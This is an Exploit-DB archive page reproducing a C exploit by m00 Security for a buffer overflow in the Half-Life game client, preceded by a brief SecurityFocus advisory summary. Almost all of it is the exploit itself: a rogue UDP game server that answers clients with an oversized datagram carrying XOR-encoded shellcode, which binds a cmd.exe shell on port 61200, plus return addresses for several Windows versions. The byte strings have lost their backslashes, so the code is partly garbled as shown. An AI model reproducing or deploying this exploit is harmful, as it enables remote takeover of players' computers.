https://www.exploit-db.com/exploits/22966

漏洞细节尚未披露

// source: http://www.securityfocus.com/bid/8299/info

// Half-Life Client has been reported prone to a remotely exploitable buffer overflow condition.

// The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client.

/*
 *            m00 Security presents
 *  HalfLife client <=v.1.1.1.0 remote exploit
 *
 *  binds cmd.exe shell on port 61200
 *
 *  Avaiable targets:
 *   1. win2k sp3 en
 *   2. winxp nosp ru
 *   3. winxp sp1 ru
 *   4. win98 se2 (u need change shellcode)
 *
 *  Bug discovered by
 *    Auriemma Luigi [www.pivx.com/luigi]
 *
 *  Authors:
 *    d4rkgr3y [grey_1999_at_mail.ru]
 *    Over_G [overg_at_mail.ru]
 *
 *  U can find us at:
 *    irc.wom.ru@m00
 *    irc.dal.net@m00security
 *
 * PS: m00security.org will be avaiable soon ;)
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>

#define PORT 27015

char ping[0x12]=
	"xffxffxffxffx6ax00x20x20x20"
	"x20x20x20x20x20x20x20x20x20";

unsigned char evilbuf[] =
	/* header of HalfLife udp-datagram | do not edit */
	"xFFxFFxFFxFFx69x6Ex66x6Fx73x74x72x69"
	"x6Ex67x72x65x73x70x6Fx6Ex73x65x00x5c"
	/* 512 bytes for bof */
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAA"
	"x5ax5ax5ax5a" // EIP
	"x90x90x90x90" // payload for esp
	/* winxp/2k xored portbind shellcode */
	/* If u want to use this xsploit against win9x/ME, change shellcode to another one */
	"x8BxC4x83xC0x15x33xC9x66xB9xD1x01x80x30x96x40xE2xFA" // decrypt
	"x15x7AxA2x1Dx62x7ExD1x97x96x96x1Fx90x69xA0xFEx18xD8x98x7Ax7ExF7"
	"x97x96x96x1FxD0x9Ex69xA0xFEx3Bx4Fx93x58x7ExC4x97x96x96x1FxD0"
	"x9AxFExFAxFAx96x96xFExA5xA4xB8xF2xFExE1xE5xA4xC9xC2x69xC0x9E"
	"x1FxD0x92x69xA0xFExE4x68x25x80x7ExBBx97x96x96x1FxD0x86x69xA0"
	"xFExE8x4Ex74xE5x7Ex88x97x96x96x1FxD0x82x69xE0x92xFEx5Dx7Bx6A"
	"xADx7Ex98x97x96x96x1FxD0x8Ex69xE0x92xFEx4Fx9Fx63x3Bx7Ex68x96"
	"x96x96x1FxD0x8Ax69xE0x92xFEx32x8CxE6x51x7Ex78x96x96x96x1FxD0"
	"xB6x69xE0x92xFEx32x3BxB8x7Fx7Ex48x96x96x96x1FxD0xB2x69xE0x92"
	"xFEx73xDFx10xDFx7Ex58x96x96x96x1FxD0xBEx69xE0x92xFEx71xEFx50"
	"xEFx7Ex28x96x96x96x1FxD0xBAxA5x69x17x7Ax06x97x96x96xC2xFEx97"
	"x97x96x96x69xC0x8ExC6xC6xC6xC6xD6xC6xD6xC6x69xC0x8Ax1Dx4ExC1"
	"xC1xFEx94x96x79x86x1Dx5AxFCx80xC7xC5x69xC0xB6xC1xC5x69xC0xB2"
	"xC1xC7xC5x69xC0xBEx1Dx46xFExF3xEExF3x96xFExF5xFBxF2xB8x1FxF0"
	"xA6x15x7AxC2x1BxAAxB2xA5x56xA5x5Fx15x57x83x3Dx74x6Bx50xD2xB2"
	"x86xD2x68xD2xB2xABx1FxC2xB2xDEx1FxC2xB2xDAx1FxC2xB2xC6x1BxD2"
	"xB2x86xC2xC6xC7xC7xC7xFCx97xC7xC7x69xE0xA6xC7x69xC0x86x1Dx5A"
	"xFCx69x69xA7x69xC0x9Ax1Dx5ExC1x69xC0xBAx69xC0x82xC3xC0xF2x37"
	"xA6x96x96x96x13x56xEEx9Ax1DxD6x9Ax1DxE6x8Ax3Bx1DxFEx9Ex7Dx9F"
	"x1DxD6xA2x1Dx3Ex2Ex96x96x96x1Dx53xC8xCBx54x92x96xC5xC3xC0xC1"
	"x1DxFAxB2x8Ex1DxD3xAAx1DxC2x93xEEx95x43x1DxDCx8Ex1DxCCxB6x95"
	"x4Bx75xA4xDFx1DxA2x1Dx95x63xA5x69x6AxA5x56x3AxACx52xE2x91x57"
	"x59x9Bx95x6Ex7Dx64xADxEAxB2x82xE3x77x1DxCCxB2x95x4BxF0x1Dx9A"
	"xDDx1DxCCx8Ax95x4Bx1Dx92x1Dx95x53x7Dx94xA5x56x1Dx43xC9xC8xCB"
	"xCDx54x92x96"
	/* end */
	"x5Cx00"; // end of udp-HL-datagram. Do not change!

char retw2ksp3[] = "xc5xafxe2x77";
char retwxpsp0[] = "x1cx80xf5x77"; // ntdll.dll :: jmp esp
char retwxpsp1[] = "xbax26xe6x77";
char retw98se2[] = "xa9xbfxdax7f";

int main(int argc, char **argv) {
	int sock, sf, len, i;
	u_short port=PORT;
	struct sockaddr_in fukin_addr, rt;
	char buf[0x1000];
	printf("nrHalfLife client v.1.1.1.0 remote exploit by m00 Securityn");
	if(argc!=2) {
		printf("
Usage: %s <remote_os>

where os:
1 - win2k sp3 ru
2 - winxp nosp ru
3 - winxp sp1 ru
4 - win98 se2 ru (need another shellcode)

",argv[0]);
		exit(0);
	}
	if(atoi(argv[1])==1) {
		for(i=0;i<4;i++) {
			evilbuf[536+i]=retw2ksp3[i];
		}
	}
	if(atoi(argv[1])==2) {
		for(i=0;i<4;i++) {
			evilbuf[536+i]=retwxpsp0[i];
		}
	}
	if(atoi(argv[1])==3) {
		for(i=0;i<4;i++) {
			evilbuf[536+i]=retwxpsp1[i];
		}
	}
	if(atoi(argv[1])==4) {
		for(i=0;i<4;i++) {
			evilbuf[536+i]=retw98se2[i];
		}
	}

	if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
		perror("[-] socket()");
		exit(0);
	}
	printf("n[+] Socket created.n");
	fukin_addr.sin_addr.s_addr = INADDR_ANY;
	fukin_addr.sin_port        = htons(port);
	fukin_addr.sin_family      = AF_INET;

	if(bind(sock, (struct sockaddr *)&fukin_addr, sizeof(fukin_addr))<0) {
		perror("[-] bind()");
		exit(0);
	}
	printf("[+] Port %i binded.n", port);
	sf = sizeof(rt);
	while(1) {
		if ((len = recvfrom(sock, buf, sizeof(buf), 0, (struct sockaddr *)&rt, &sf))<0) {
			perror("[-] recv()");
			exit(1);
		}
		printf("[+] Incoming udp datagram: ");
 		for (i=0;i<=len;i++){
			printf("%c",buf[i]);
		}
		printf("n[~] Identyfication... ");
		if(strstr(buf,"ping")) {
			printf("PING requestn[~] Sending answer... ");
			if(sendto(sock, ping, sizeof(ping), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {
				perror("[-] send()");
				exit(1);
			} else {
				printf("OKn");
			}
			continue;
		}
		if(strstr(buf,"infostring")) {
			printf("INFOSTRING requestn[~] Attacking... OKn");
			printf("[+] Now try to connect to: %s:61200n", inet_ntoa(rt.sin_addr));
			if(sendto(sock, evilbuf, sizeof(evilbuf), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {
				perror("[-] send()");
				exit(1);
			}
			continue;
		}
		printf("unknow requestn");
	}
	close(sock);
	return 0;
}
// mOOOOOOOOOOOOOoooooooooooooooooooooo